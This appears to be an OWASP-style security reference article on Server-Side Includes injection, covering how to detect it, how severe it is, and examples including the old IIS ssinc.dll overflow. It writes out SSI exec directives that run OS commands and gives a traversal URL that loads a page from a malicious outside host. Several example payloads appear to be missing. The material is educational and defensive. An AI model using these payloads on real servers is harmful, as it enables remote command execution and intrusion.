Server-Side Includes (SSI) Injection

Description
SSIs are directives present on Web applications used to feed a HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some action before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user.

The Server-Side Include attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited thru manipulation of SSI in use on the application or forcing its use thru user input fields.

It is possible to check if the application is properly validating input fields data by inserting characters that are used in SSI directives, like:

< ! # = / . " - > and [a-zA-Z0-9]

Another way to discover if the application is vulnerable is to verify the presence of pages with extension .stm, .shtm and .shtml. However, the lack of these type of pages does not mean that the application is protected against SSI attacks.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under permission of web server process owner.

The attack possibilities that the intruder can gain access sensitive information, as password files and execute shell commands. The SSIs directives are inject in input fields and they are sent to the web server. The web server parses and executes the directives, before supplying the page. Then, the attack result will be viewable the next time that the page will be loaded for user browser.

Severity
High

Likelihood of exploitation
Medium to High

Example 1
The commands used to inject SSI vary according to the server operational system in use. The following commands represent the syntax that should be used to execute OS commands.

Linux:

List files of directory:

< !--#exec cmd="ls" -->

Access directories:

Windows:

List files of directory:

< !--#exec cmd="dir" -->

Access directories: < !--#exec cmd="cd C:\admin\dir">

Example 2
Other SSI examples that can be used to access and set server information:

To change the error message output:

To show current document filename:

To show virtual path and filename:

Using the “config” command and “timefmt” parameter, it is possible to control the date and time output format:

Using the “fsize” command, it is possible to print the size of selected file:

Example 3
An old vulnerability in the IIS versions 4.0 and 5.0 allows that an attacker obtain system privileges through a buffer overflow failure in a dynamic link library (ssinc.dll). The “ssinc.dll” is used to interpreter process Server-Side Includes. CVE 2001-0506.

By creating a malicious page containing the SSI code bellow and forcing the application to load this page (Path Traversal attack), it’s possible to perform this attack:

ssi_over.shtml

PS: The number of “U” needs to be longer than 2049. Forcing application to load the ssi_over.shtml page:

Non-malicious URL:

www.vulnerablesite.org/index.asp?page=news.asp

Malicious URL: www.vulnerablesite.org/index.asp?page=www.malicioussite.com/ssi_over.shtml

If the IIS return a blank page it indicates that an overflow has occurred. In this case, the attacker might manipulate the procedure flow and executes arbitrary code.

External References
http://www.students.mines.edu/examples/ - CGI and SSI Examples

http://www.comptechdoc.org/independent/web/cgi/ssimanual/ssiexamples.html - SSI Examples

Related Threats
Category:Command Execution

Related Attacks

 * Code Injection

Related Vulnerabilities
Category:Input Validation Vulnerability

Related Countermeasures
Category:Input Validation Vulnerability